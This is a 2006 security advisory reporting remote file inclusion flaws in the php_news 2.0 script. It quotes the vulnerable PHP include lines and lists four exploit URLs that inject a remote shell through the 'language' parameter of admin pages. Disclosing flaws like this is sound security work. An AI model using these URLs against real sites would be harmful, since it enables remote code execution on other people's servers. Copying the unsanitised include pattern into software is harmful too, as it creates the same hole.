Security Advisory: php_news => 2.0 Remote File Include Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  WebspotBlogging => 3.0 Remote File Include Vulnerabilities
  DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities
  QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities
  Back-end => 0.4.5 Remote File Include Vulnerabilities

From: h4ck3riran_(at)_yahoo.com <h4ck3riran_(at)_yahoo.com>
Date: 27.09.2006
Subject: php_news => 2.0 Remote File Include Vulnerabilities

# php_news => 2.0 Remote File Include Vulnerabilities

# Script.............. :php_news
# Discovered By.... : Root3r_H3ll
# Location .......... : Iran
# Class.............. : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# <Spical TNX Irania Hackers :
( Aria-Security , Crouz , DeltaHacking , Iranhackers
Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev )

# </\/\\/_ 10\/3 15 1|)\4/\/
         |)\0073|)\_|-|311

# CodEs :

include_once("admin/language/".$language."_news.
php")
include("language/".$language."_catagory.php")
include_once("language/".$language."_news.php");
include("language/".$language."_users.php")

# ExPloits :

Www.Site.coM/[path]/admin/user_user.php?language=Sh3ll
Www.Site.coM/[path]/admin/news.php?language=Sh3ll
Www.Site.coM/[path]/admin/catagory.php?language=Sh3ll
Www.Site.coM/[path]/creat_news_all.php?language=Sh3ll

test server